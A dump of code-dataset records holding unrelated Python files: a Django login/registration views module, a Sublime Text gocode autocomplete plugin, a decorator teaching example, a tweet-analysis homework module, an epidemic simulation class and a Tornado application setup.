study_name, owner, description_str,\n value_dict[k][1], value_str, obsolete_str))\n else:\n raise Exception('Study without experiment {}'.format(study_name))\n\n csv_descriptions = [v for v in csv_descriptions if '=0' not in v.value_str]\n sorted_desc = sorted(csv_descriptions, key=lambda v: v.name)\n with open(args.output_file, 'w') as f:\n for desc in sorted_desc:\n f.write('{};{};{};{};{};{}\\n'.format(\n desc.name, desc.owner, desc.description, desc.obsolete,\n int(desc.weight*100), desc.value_str))\n\n logging.info('All:%s\\n Size:%d Switches:%d Not 0:%d Obsoletes:%d',\n str(set([s.name for s in csv_descriptions])),\n len(set([s.name for s in csv_descriptions])),\n len(set([s.name for s in csv_descriptions if s.weight == 1])),\n len(set([s.name for s in csv_descriptions if '0' not in s.value_str])),\n len(set([s.name for s in csv_descriptions if s.obsolete != ' '])))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/production_config_to_csv.py","file_name":"production_config_to_csv.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"290340376","text":"from django.shortcuts import render, get_object_or_404, render_to_response\nfrom guild.models import Service, Customer, ServiceType, Provider\nfrom django.contrib import auth\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.contrib.auth.forms import UserCreationForm\n\n\ndef login(request):\n c = {}\n c.update(csrf(request))\n return render_to_response('guild/index.html', c)\n\n\ndef auth_view(request):\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect('/guild/loggedin')\n else:\n return HttpResponseRedirect('/guild/invalid')\n\n\ndef loggedin(request):\n return render_to_response('guild/home.html', {'full_name', request.user.username})\n\n\ndef invalid(request):\n return render_to_response('guild/index.html', {'top_message': 'Please enter a valid username/password'})\n\n\ndef logout(request):\n auth.logout(request)\n return render_to_response('guild/index.html', {'top_message': 'You have successfully logged out.'})\n\n\n# Create your views here.\ndef index(request):\n latest_services_list = Service.objects.order_by('-service_date')[:5]\n context = {\n 'latest_services_list': latest_services_list,\n }\n return render(request, 'guild/index.html', context)\n\n\ndef customer_detail(request, customer_id):\n customer = get_object_or_404(Customer, pk=customer_id)\n return render(request, 'guild/customer_details.html', {'customer': customer})\n\n\ndef service_type_list(request, service_type_id):\n service_type = get_object_or_404(ServiceType, pk=service_type_id)\n providers = Provider.objects.filter(service_type=service_type)\n services = []\n for prvds in providers:\n srvs = Service.objects.filter(provider=prvds)\n services.extend(srvs)\n return render(\n request,\n 'guild/services_list_by_service_type.html',\n {'services': services, 'service_type': service_type}\n )\n\n\ndef register_user(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/guild/register_success')\n\n\n args = {}\n args.update(csrf(request))\n\n args['form'] = UserCreationForm()\n\n return render_to_response('guild/register.html', args)\n\n\ndef register_success(request):\n return render_to_response('guild/home.html', {'full_name': request.user.username, 'register_message': 'You successfully registered'})\n\n\ndef hamed(request):\n return render_to_response('guild/hamed.html')","sub_path":"guild/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"434322666","text":"import sublime, sublime_plugin, subprocess, difflib, threading, golangconfig\n\n# go to balanced pair, e.g.:\n# ((abc(def)))\n# ^\n# \\--------->^\n#\n# returns -1 on failure\ndef skip_to_balanced_pair(str, i, open, close):\n\tcount = 1\n\ti += 1\n\twhile i < len(str):\n\t\tif str[i] == open:\n\t\t\tcount += 1\n\t\telif str[i] == close:\n\t\t\tcount -= 1\n\n\t\tif count == 0:\n\t\t\tbreak\n\t\ti += 1\n\tif i >= len(str):\n\t\treturn -1\n\treturn i\n\n# split balanced parens string using comma as separator\n# e.g.: \"ab, (1, 2), cd\" -> [\"ab\", \"(1, 2)\", \"cd\"]\n# filters out empty strings\ndef split_balanced(s):\n\tout = []\n\ti = 0\n\tbeg = 0\n\twhile i < len(s):\n\t\tif s[i] == ',':\n\t\t\tout.append(s[beg:i].strip())\n\t\t\tbeg = i+1\n\t\t\ti += 1\n\t\telif s[i] == '(':\n\t\t\ti = skip_to_balanced_pair(s, i, \"(\", \")\")\n\t\t\tif i == -1:\n\t\t\t\ti = len(s)\n\t\telse:\n\t\t\ti += 1\n\n\tout.append(s[beg:i].strip())\n\treturn list(filter(bool, out))\n\n\ndef extract_arguments_and_returns(sig):\n\tsig = sig.strip()\n\tif not sig.startswith(\"func\"):\n\t\treturn [], []\n\n\t# find first pair of parens, these are arguments\n\tbeg = sig.find(\"(\")\n\tif beg == -1:\n\t\treturn [], []\n\tend = skip_to_balanced_pair(sig, beg, \"(\", \")\")\n\tif end == -1:\n\t\treturn [], []\n\targs = split_balanced(sig[beg+1:end])\n\n\t# find the rest of the string, these are returns\n\tsig = sig[end+1:].strip()\n\tsig = sig[1:-1] if sig.startswith(\"(\") and sig.endswith(\")\") else sig\n\treturns = split_balanced(sig)\n\n\treturn args, returns\n\n# takes gocode's candidate and returns sublime's hint and subj\ndef hint_and_subj(cls, name, type):\n\tsubj = name\n\tif cls == \"func\":\n\t\thint = cls + \" \" + name\n\t\targs, returns = extract_arguments_and_returns(type)\n\t\tif returns:\n\t\t\thint += \"\\t\" + \", \".join(returns)\n\t\tif args:\n\t\t\tsargs = []\n\t\t\tfor i, a in enumerate(args):\n\t\t\t\tea = a.replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\")\n\t\t\t\tsargs.append(\"${{{0}:{1}}}\".format(i+1, ea))\n\t\t\tsubj += \"(\" + \", \".join(sargs) + \")\"\n\t\telse:\n\t\t\tsubj += \"()\"\n\telse:\n\t\thint = cls + \" \" + name + \"\\t\" + type\n\treturn hint, subj\n\ndef diff_sanity_check(a, b):\n\tif a != b:\n\t\traise Exception(\"diff sanity check mismatch\\n-%s\\n+%s\" % (a, b))\n\nclass GocodeGofmtCommand(sublime_plugin.TextCommand):\n\tdef run(self, edit):\n\t\tview = self.view\n\t\tsrc = view.substr(sublime.Region(0, view.size()))\n\t\tpath, env = golangconfig.subprocess_info(\"goimports\", ['GOPATH', 'PATH'], view=view)\n\t\tgofmt = subprocess.Popen([path],\n\t\t\tstdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\tsout, serr = gofmt.communicate(src.encode())\n\t\tif gofmt.returncode != 0:\n\t\t\tprint(serr.decode(), end=\"\")\n\t\t\treturn\n\n\t\tnewsrc = sout.decode()\n\t\tdiff = difflib.ndiff(src.splitlines(), newsrc.splitlines())\n\t\ti = 0\n\t\tfor line in diff:\n\t\t\tif line.startswith(\"?\"): # skip hint lines\n\t\t\t\tcontinue\n\n\t\t\tl = (len(line)-2)+1\n\t\t\tif line.startswith(\"-\"):\n\t\t\t\tdiff_sanity_check(view.substr(sublime.Region(i, i+l-1)), line[2:])\n\t\t\t\tview.erase(edit, sublime.Region(i, i+l))\n\t\t\telif line.startswith(\"+\"):\n\t\t\t\tview.insert(edit, i, line[2:]+\"\\n\")\n\t\t\t\ti += l\n\t\t\telse:\n\t\t\t\tdiff_sanity_check(view.substr(sublime.Region(i, i+l-1)), line[2:])\n\t\t\t\ti += l\n\nclass Gocode(sublime_plugin.EventListener):\n\t\"\"\"Sublime Text gocode integration.\"\"\"\n\n\tdef __init__(self):\n\t\tself.completions = None\n\n\tdef fetch_query_completions(self, view, prefix, location, gocodeFlag, path, env):\n\t\t\"\"\"Fetches the query completions of for the given location\n\n\t\tExecute gocode and parse the returned csv. Once the results are generated\n\t\tare the results in as a list stored in `completions`. Once stored is the query completions\n\t\twindow opened (forced).\n\n\t\t:param view: currently active sublime view\n\t\t:type view: sublime.View\n\t\t:param prefix: string for completions\n\t\t:type prefix: basestring\n\t\t:param locations: offset from beginning\n\t\t:type locations: int\n\t\t\"\"\"\n\n\t\tself._location = location\n\n\t\tsrc = view.substr(sublime.Region(0, view.size()))\n\t\tfilename = view.file_name()\n\t\tcloc = \"c{0}\".format(location)\n\n\t\tcmd = [path] + gocodeFlag + [\"autocomplete\", filename, cloc]\n\t\tgocode = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\n\t\tout = gocode.communicate(src.encode())[0].decode()\n\t\tresults = self.generate_completions(out)\n\n\t\t# Exit conditions:\n\t\tif len(results) == 0:\n\t\t\treturn\n\n\t\tself.completions = results\n\t\tself.open_query_completions(view)\n\n\tdef generate_completions(self, out):\n\t\t\"\"\" Parses the returned gocode results and generates a usable autocomplete list \"\"\"\n\n\t\tresults = []\n\t\tfor line in filter(bool, out.split(\"\\n\")):\n\t\t\targ = line.split(\",,\")\n\t\t\thint, subj = hint_and_subj(arg[0], arg[1], arg[2])\n\t\t\tresults.append([hint, subj])\n\n\t\treturn results\n\n\tdef open_query_completions(self, view):\n\t\t\"\"\"Opens (forced) the sublime autocomplete window\"\"\"\n\n\t\tview.run_command(\"hide_auto_complete\")\n\t\tview.run_command(\"auto_complete\", {\n\t\t\t\"disable_auto_insert\": True,\n\t\t\t\"next_completion_if_showing\": False,\n\t\t\t\"auto_complete_commit_on_tab\": True,\n\t\t})\n\n\tdef on_query_completions(self, view, prefix, locations):\n\t\t\"\"\"Sublime autocomplete event handler.\n\n\t\tGet completions depends on current cursor position and return\n\t\tthem as list of ('possible completion', 'completion type')\n\n\t\t:param view: currently active sublime view\n\t\t:type view: sublime.View\n\t\t:param prefix: string for completions\n\t\t:type prefix: basestring\n\t\t:param locations: offset from beginning\n\t\t:type locations: int\n\n\t\t:return: list of tuple(str, str)\n\t\t\"\"\"\n\t\tlocation = locations[0]\n\n\t\tif not view.match_selector(location, \"source.go\"):\n\t\t\treturn\n\n\t\tif self.completions:\n\t\t\tcompletions = self.completions\n\t\t\tself.completions = None\n\t\t\treturn completions\n\n\t\tgocodeFlag = [\"-f=csv\", \"-sock=none\"] if golangconfig.setting_value(\"gocode_serverless_mode\")[0] else [\"-f=csv\"]\n\t\tpath, env = golangconfig.subprocess_info(\"gocode\", ['GOPATH', 'PATH'], view=view)\n\t\tthread = threading.Thread(target=self.fetch_query_completions, args=(view, prefix, location, gocodeFlag, path, env))\n\t\tthread.start()\n\n\tdef on_pre_save(self, view):\n\t\tif not view.match_selector(0, \"source.go\"):\n\t\t\treturn\n\t\tview.run_command('gocode_gofmt')\n","sub_path":"gocode.py","file_name":"gocode.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341861717","text":"\"\"\"\r\n============================\r\nAuthor:柠檬班-木森\r\nTime:2020/5/13 21:26\r\nE-mail:3247119728@qq.com\r\nCompany:湖南零檬信息技术有限公司\r\n============================\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\n\r\n@data()\r\n\r\n\"\"\"\r\n\r\nimport time\r\n\r\nprint()\r\n\r\n\r\ndef doc(func):\r\n \"\"\"\r\n :param func: 接收被装饰的函数的\r\n :return:\r\n \"\"\"\r\n\r\n def wrapper(*args, **kwargs):\r\n print('------2-----')\r\n print('装饰器doc扩展的功能代码')\r\n # 调用原功能函数\r\n func(*args, **kwargs)\r\n print('----------执行完毕--4---------')\r\n\r\n return wrapper\r\n\r\n\r\ndef count_time(func):\r\n \"\"\"\r\n :param func: 接收被装饰的函数的\r\n :return:\r\n \"\"\"\r\n\r\n def wrapper(*args, **kwargs):\r\n # 函数调用之前获取一下当前的实际:start_time\r\n start_time = time.time()\r\n print('-------1----------')\r\n # 调用原功能函数\r\n func(*args, **kwargs)\r\n # 函数调用之后:再获取一下当前时间 end_time\r\n end_time = time.time()\r\n print('-----------5-------')\r\n print('函数运行的时间为:', end_time - start_time)\r\n\r\n return wrapper\r\n\r\n\r\n# work = count_time(doc(work))\r\n@count_time # work = count_time(work)\r\n@doc # work = doc(work)\r\ndef work(a, b):\r\n print('----3-------')\r\n print(\"a+b:\", a + b)\r\n\r\n\r\nwork(11, 22)\r\n\r\nfrom ddt import data\r\n","sub_path":"python基础高阶编程/py_04day/06一个函数被多个装饰器装饰.py","file_name":"06一个函数被多个装饰器装饰.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197445987","text":"def chars_after_symbol(string, symbol):\r\n \"\"\" (str, str) -> list of str\r\n \r\n Return a list of all the substrings that occur after the specified symbol. \r\n A substring consists of all the characters after an occurence of the symbol \r\n until a space, punctuation, or end of tweet is reached. The substrings in \r\n the list do not include the symbol. This is meant to be a helper function \r\n because both extract_mentions and extract_hashtags can make use of it.\r\n \r\n Examples:\r\n >>> chars_after_symbol(\"Hello world\", \"@\")\r\n []\r\n >>> chars_after_symbol(\"I am #superman. Go #Superman!\", \"#\")\r\n ['superman', 'Superman']\r\n >>> chars_after_symbol(\"I'm so @cool! I have so much @power now!\", \"@\")\r\n ['cool', 'power']\r\n \r\n \"\"\"\r\n \r\n start_adding_substr = False #dictates whether to start adding to substrings.\r\n substrings = []\r\n substr_num = -1 \r\n for index in range(len(string)): \r\n if(not(string[index].isalnum()) and not(string[index] == symbol)):\r\n start_adding_substr = False \r\n elif (index != 0 and string[index] == symbol and\\\r\n string[index - 1] != \" \"):\r\n start_adding_substr = False\r\n elif(start_adding_substr):\r\n substrings[substr_num] = substrings[substr_num] + string[index]\r\n elif(string[index] == symbol):\r\n start_adding_substr = True\r\n substr_num += 1\r\n substrings.append(\"\") \r\n return substrings\r\n \r\ndef extract_mentions(tweet):\r\n \"\"\" (str) -> list of str\r\n \r\n Return a list of the mentions in the tweet parameter in the order they \r\n appear in the tweet. The returned mentions have the @ symbol removed. \r\n Mentions may appear more than once in the list.\r\n \r\n Examples:\r\n >>> extract_mentions(\"@Martin hello there @Martin\")\r\n ['Martin', 'Martin']\r\n >>> extract_mentions(\"Hello @Martin how is @Donald?\")\r\n ['Martin', 'Donald']\r\n >>> extract_mentions(\"I love computer science.\")\r\n []\r\n \r\n \"\"\"\r\n \r\n return chars_after_symbol(tweet, \"@\")\r\n\r\ndef extract_hashtags(tweet):\r\n \"\"\" (str) -> list of str\r\n \r\n Return a list of the hashtags in the tweet in the order that the first\r\n instance of each hashtag appears in the tweet. Hashtags may only occur once\r\n in the list. The items in the list have the # symbol removed. Note that\r\n hashtags are not case sensitive. This function converts hashtags to their\r\n lowercase form.\r\n \r\n Examples:\r\n >>> extract_hashtags(\"this is #Incredible, absolutely #incredible\")\r\n ['incredible']\r\n >>> extract_hashtags(\"this is #really #superb!\")\r\n ['really', 'superb']\r\n >>> extract_hashtags(\"hello #world \")\r\n ['world']\r\n \r\n \"\"\"\r\n \r\n total_hashtags = chars_after_symbol(tweet, \"#\")\r\n hashtags = total_hashtags[:] \r\n if(hashtags == []): \r\n return []\r\n hashtags[0] = hashtags[0].lower()\r\n index = 1\r\n while index < len(hashtags):\r\n hashtags[index] = hashtags[index].lower()\r\n if(hashtags[index] in hashtags[:index]): #no duplicate hashtags\r\n hashtags.pop(index)\r\n index -= 1\r\n index += 1\r\n return hashtags\r\n\r\ndef words_modifier(words):\r\n \"\"\" (list of str) -> NoneType\r\n \r\n Return nothing. Modifies a list of words to remove hashtags, mentions, and \r\n URLs from the list, and removing non-alphanumeric characters from words in\r\n the list. It also lowercases the words. This is a helper function for \r\n count_words.\r\n \r\n Examples:\r\n >>> words = [\"Abc\", \"@Hello\", \"#hello\", \"don't\"]\r\n >>> words_modifier(words)\r\n >>> words\r\n ['abc', 'dont']\r\n \r\n \"\"\"\r\n \r\n index = 0\r\n while index < len(words): \r\n if(words[index][0] == \"#\" or words[index][0] == \"@\"):\r\n words.pop(index) #remove hashtags and mentions\r\n index -= 1\r\n elif(len(words[index]) >= 4 and words[index][:4].lower() == \"http\"):\r\n words.pop(index) #remove URLs\r\n index -= 1 \r\n else:\r\n ch_index = 0\r\n while ch_index < len(words[index]): #remove punctuation\r\n if (not(words[index][ch_index].isalnum())):\r\n words[index] = words[index][:ch_index] + \\\r\n words[index][ch_index + 1:] \r\n ch_index -= 1\r\n ch_index += 1\r\n if(len(words) != 0):\r\n words[index] = words[index].lower()\r\n index += 1 \r\n \r\n\r\ndef count_words(tweet, word_dict):\r\n \"\"\" (str, dict of {str, int}) -> None\r\n \r\n Return nothing. This function updates the word_dictionary by adding words\r\n and updating the number of occurrences of each word in the dictionary by \r\n incrementing them by the amount of times they appear in the tweet. Words are\r\n converted to lowercase in the dictionary. Words are separated by whitespace\r\n and punctuation does not comprise part of the word.\r\n \r\n Examples:\r\n >>> word_dict = {\"i\": 7, \"love\": 3, \"milk\": 1}\r\n >>> count_words(\"I love chocolate milk and milk chocolate\", word_dict)\r\n >>> word_dict == {\"i\": 8, \"love\": 4, \"milk\": 3, \"chocolate\": 2, \"and\": 1}\r\n True\r\n >>> count_words(\"#cash I'm a rapper now @ChiefKeef http://gangsterrap.com\",\\\r\n word_dict)\r\n >>> word_dict == {\"i\": 8, \"love\": 4, \"milk\": 3, \"chocolate\": 2, \"and\": 1,\\\r\n \"im\": 1, \"a\": 1, \"rapper\": 1, \"now\": 1}\r\n True\r\n \r\n \"\"\"\r\n \r\n words = tweet.split(\" \") \r\n words_modifier(words)\r\n for word in words: \r\n if word in word_dict: \r\n word_dict[word] += 1\r\n else:\r\n word_dict[word] = 1 \r\n\r\ndef common_words(word_dict, max_words):\r\n \"\"\" (dict of {str, int}, int) -> None\r\n \r\n Return nothing. This function updates the dictionary to include only the \r\n most common words with a maximum of max_words in the dictionary. If there is \r\n a tie that results in there being more than max_words in the dictionary, \r\n those tied items are not included.\r\n \r\n Examples: \r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 2)\r\n >>> word_dict == {'a': 7, 'b': 7}\r\n True\r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 3)\r\n >>> word_dict == {'a': 7, 'b': 7}\r\n True\r\n >>> word_dict = {\"a\": 7, \"b\": 7, \"c\": 6, \"d\": 2, \"e\": 6}\r\n >>> common_words(word_dict, 1)\r\n >>> word_dict == {}\r\n True\r\n \r\n \"\"\"\r\n \r\n nums = []\r\n for key in word_dict:\r\n nums.append(word_dict[key])\r\n nums.sort(reverse = True)\r\n popular_nums = []\r\n index = 0\r\n occurrences = 0\r\n while index < len(nums): #copy the largest ints to popular_nums (<= N)\r\n current_occurrences = nums.count(nums[index]) \r\n occurrences += current_occurrences\r\n if(not occurrences > max_words):\r\n popular_nums.append(nums[index])\r\n else:\r\n break\r\n index += current_occurrences\r\n word_dict_copy = dict(word_dict) \r\n for key2 in word_dict_copy: #delete the less popular items\r\n if(not(word_dict[key2] in popular_nums)):\r\n del word_dict[key2]\r\n\r\ndef generate_fields(tweet_str, field_list):\r\n \"\"\" (list of str, list of str) -> int\r\n \r\n Generate all of the fields in the file and put them into field_list. This \r\n is a helper function for read_tweets\r\n \r\n Examples:\r\n >>> field_list = []\r\n >>> tweet_str = \"12,12,n,t,3,2Hello\"\r\n >>> generate_fields(tweet_str, field_list)\r\n >>> field_list\r\n ['12', '12', 'n', 't', '3', '2', 'Hello']\r\n \r\n \"\"\"\r\n \r\n comma_index = 0\r\n for i in range(5): #extract the first 5 fields (the ones with commas at end)\r\n new_comma_index = tweet_str.index(\",\", comma_index + 1)\r\n field_list.append(tweet_str[comma_index:new_comma_index])\r\n comma_index = new_comma_index + 1 \r\n last_two_fields = tweet_str[comma_index:]\r\n for index in range(len(last_two_fields)): #separate and extract last two\r\n if not(last_two_fields[index].isdigit()):\r\n field_list.append(last_two_fields[:index])\r\n field_list.append(last_two_fields[index:]) \r\n break\r\n for j in range(6): #remove newlines except for tweet\r\n field_list[j] = field_list[j].replace(\"\\n\", \"\") \r\n \r\ndef read_tweets(file):\r\n \"\"\" (file open for reading) -> dict of {str: list of tweet tuples}\r\n \r\n Return a dictionary with candidate names as keys and a list of tuples as\r\n values; with each tuple representing a tweet. The tuples are in the form\r\n (candidate, tweet text, date, source, favorite count, retweet count), where \r\n every item is a string except date, favorite count and retweet count which\r\n are integers.\r\n \r\n \"\"\"\r\n \r\n text = file.read()\r\n all_tweets = list(filter(None, text.split(\"<< NoneType\r\n \r\n Return nothing. This function is a helper function for most_popular. It\r\n modifies the candidate_counts and candidate_names lists of that function so \r\n that they include the popularity counts (favorites + retweets) for each \r\n candidate for candidate_counts and the names of the candidates for \r\n candidate_names. The lists are meant to be parallel.\r\n \r\n Examples:\r\n >>> cand_dict = {\"A\": [(\"A\", \"x\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"x\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"x\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"x\", 24, \"n\", 4, 4)]}\r\n >>> candidate_counts = []\r\n >>> candidate_names = []\r\n >>> update_candidate_counts_names(cand_dict, 22, 25, candidate_counts, \\\r\n candidate_names)\r\n >>> candidate_counts\r\n [34, 34]\r\n >>> candidate_names == ['A', 'B'] or candidate_names == ['B', 'A']\r\n True\r\n \r\n \"\"\"\r\n \r\n key_index = 0\r\n for key in cand_dict:\r\n candidate_counts.append(0) \r\n for index in range(len(cand_dict[key])):\r\n if (not(cand_dict[key][index][0] in candidate_names)):\r\n candidate_names.append(cand_dict[key][index][0])\r\n date = cand_dict[key][index][2]\r\n if (date1 <= date <= date2):\r\n candidate_counts[key_index] += (cand_dict[key][index][4]\\\r\n + cand_dict[key][index][5]) \r\n key_index += 1 \r\n\r\ndef most_popular(cand_dict, date1, date2):\r\n \"\"\" (dict of {str: list of tweet tuples}, int, int) -> str\r\n \r\n Return the most popular candidate between date1 and date2 (where date1 <= \r\n date2). Populartity is defined by the sum of all favorites and retweets for\r\n a given candidate's tweets in the specified timeframe. Return \"Tie\" if there\r\n is a tie for the most popular candidate.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"x\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"x\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"x\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"x\", 24, \"n\", 4, 4)]}\r\n >>> most_popular(dictionary, 22, 22)\r\n 'B'\r\n >>> most_popular(dictionary, 22, 25)\r\n 'Tie'\r\n \r\n \"\"\"\r\n \r\n candidate_counts = []\r\n candidate_names = []\r\n update_candidate_counts_names(cand_dict, date1, date2, candidate_counts,\\\r\n candidate_names)\r\n max_popularity = max(candidate_counts)\r\n tie_int = 0 #this will equal (number of ties for max popularity) + 1\r\n for count in candidate_counts:\r\n if(count == max_popularity):\r\n tie_int += 1\r\n if(tie_int > 1):\r\n return \"Tie\"\r\n else:\r\n i = candidate_counts.index(max_popularity)\r\n return candidate_names[i]\r\n \r\ndef update_hashtags_names(cand_dict, candidate_hashtags, candidate_names):\r\n \"\"\" (dict of {str: list of tweet tuples}, list of str, list of str)\r\n -> NoneType\r\n \r\n Return nothing. This function is a helper function for detect_author. This\r\n function modifies both candidate_hashtags and candidate_names to include\r\n lists of hashtags for each candidate and the names of each candidate \r\n respectively.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"h #a\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"h #b\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"h #b\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"h #c\", 24, \"n\", 4, 4), (\"B\", \"h #d\", 25, \"n\", 4, 4)]}\r\n >>> candidate_hashtags = []\r\n >>> candidate_names = []\r\n >>> update_hashtags_names(dictionary, candidate_hashtags, candidate_names)\r\n >>> candidate_hashtags == [['a', 'b'], ['b', 'c', 'd']] or\\\r\n candidate_hashtags == [['b', 'c', 'd'], ['a', 'b']]\r\n True\r\n >>> candidate_names == ['A', 'B'] or candidate_names == ['B', 'A']\r\n True\r\n \r\n \"\"\"\r\n \r\n candidate_index = 0\r\n for key in cand_dict:\r\n candidate_hashtags.append([])\r\n for index in range(len(cand_dict[key])):\r\n if(not(cand_dict[key][index][0] in candidate_names)):\r\n candidate_names.append(cand_dict[key][index][0])\r\n hashtags = extract_hashtags(cand_dict[key][index][1])\r\n for hashtag in hashtags:\r\n candidate_hashtags[candidate_index].append(hashtag)\r\n candidate_index += 1 \r\n\r\ndef find_likely_author(tweet_hashtags, candidate_hashtags, candidate_names):\r\n \"\"\" (list of str, list of str, list of str) -> str\r\n \r\n Return the most likely author of a tweet based on comparing the \r\n tweet_hashtags to the candidate_hashtags.\r\n \r\n Examples:\r\n >>> candidate_names = [\"A\", \"B\"]\r\n >>> candidate_hashtags = [[\"#a\",\"#b\"], [\"#b\", \"#c\", \"#d\"]]\r\n >>> find_likely_author([\"#a\", \"#b\"], candidate_hashtags, candidate_names)\r\n 'Unknown'\r\n >>> find_likely_author([\"#c\", \"#d\"], candidate_hashtags, candidate_names)\r\n 'B'\r\n \r\n \"\r\n \r\n \"\"\"\r\n cand_tweeter = \"\"\r\n for tweet_hashtag in tweet_hashtags:\r\n cand_count = 0 #number of candidates that use this hashtag\r\n c_hashtag = \"\" #saves the list of hashtags with tweet_hashtag\r\n for candidate_hashtag in candidate_hashtags:\r\n if tweet_hashtag in candidate_hashtag:\r\n cand_count += 1\r\n if cand_count > 1:\r\n return \"Unknown\" \r\n c_hashtag = candidate_hashtag \r\n if cand_count == 1:\r\n if(cand_tweeter == \"\"):\r\n cand_tweeter = candidate_names\\\r\n [candidate_hashtags.index(c_hashtag)]\r\n else: #compare author of this hashtag to author of previous ones\r\n new_cand_tweeter = cand_tweeter\r\n cand_tweeter = candidate_names\\\r\n [candidate_hashtags.index(c_hashtag)]\r\n if(cand_tweeter != new_cand_tweeter):\r\n return \"Unknown\"\r\n return cand_tweeter \r\n \r\n \r\ndef detect_author(cand_dict, tweet):\r\n \"\"\" (dict of {str: list of tweet tuples}, str) -> str\r\n \r\n Return the most likely author of the specified tweet. A candidate is the \r\n most likely author of the specified tweet if the hashtags of the tweet \r\n are used uniquely by that candidate. Return \"Unknown\" if there are no \r\n hashtags or if any of the hashtags have been used by more than one \r\n candidate.\r\n \r\n Examples:\r\n >>> dictionary = {\"A\": [(\"A\", \"h #a\", 22, \"n\", 5, 6),\\\r\n (\"A\", \"h #b\", 23, \"n\", 11, 12)], \"B\": [(\"B\", \"h #b\", 22, \"n\", 15, 11),\\\r\n (\"B\", \"h #c\", 24, \"n\", 4, 4), (\"B\", \"h #d\", 25, \"n\", 4, 4)]}\r\n >>> detect_author(dictionary, \"h #a #b\")\r\n 'Unknown'\r\n >>> detect_author(dictionary, \"h #c #d\")\r\n 'B'\r\n >>> detect_author(dictionary, \"h #a #e\")\r\n 'A'\r\n \r\n \"\"\"\r\n \r\n tweet_hashtags = extract_hashtags(tweet)\r\n candidate_hashtags = []\r\n candidate_names = []\r\n update_hashtags_names(cand_dict, candidate_hashtags, candidate_names)\r\n return find_likely_author(tweet_hashtags, candidate_hashtags,\\\r\n candidate_names) ","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":17056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"311928396","text":"import random as rd\n\nclass World:\n\n def __init__(self, death_rate, spread_rate, disease_time, low_confinement, high_confinement):\n self.death_rate=death_rate\n self.spread_rate=spread_rate\n self.disease_time=disease_time\n self.low_confinement=low_confinement\n self.high_confinement=high_confinement\n\n ## Update all person of 'persons' which must be in the graph\n ## Return a dictionnary with the number of each state\n def update_all(self, graph, persons, p_test, n_prime):\n state={'S':0,'R':0,'D':0,'M':0,'C':0}\n for k in range(len(persons)):\n if (self.low_confinement and persons[k].is_confined):\n for i in range(len(persons[k].visited[persons[k].visited_cursor])): ## for each person visited yesterday\n persons[k].update_in_contact(persons[k].visited[persons[k].visited_cursor][i], self.death_rate, self.spread_rate, self.disease_time)\n elif not(self.high_confinement and persons[k].is_confined):\n for j in range(len(graph.adjacency[k])): ## for each nodes connected to persons[k]\n persons[k].update_in_contact(graph.adjacency[k][j], self.death_rate, self.spread_rate, self.disease_time)\n\n persons[k].update_end_of_day(self.disease_time, self.death_rate, p_test)\n\n state[persons[k].state]+=1\n if persons[k].is_confined:\n state['C']+=1\n\n #random tests each day on a random sample of n' < n persons\n sample = rd.sample(persons, n_prime)\n for j in range(len(sample)):\n sample[j].test_virus(self.disease_time,p_test)\n if sample[j].is_confined:\n state['C']+=1\n return state\n","sub_path":"World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"533652135","text":"#-*- coding:utf-8 -*-\n'''\nCreated on 2016年6月22日\n\n@author: wenbin\n'''\n\nimport tornado.web\nfrom router import Route\nimport os\nclass Application(tornado.web.Application):\n \n def __init__(self):\n settings = dict(\n gzip=True,\n template_path=os.path.join(os.path.dirname(__file__), \"template\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n static_handler_class=tornado.web.StaticFileHandler,\n cookie_secret='61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",',\n debug=True,\n login_url = '/'\n )\n tornado.web.Application.__init__(self, Route.get_routes(),**settings)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"135122274","text":"\n# Copyright 2018 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n\nfrom squid_py.agreements.service_agreement import 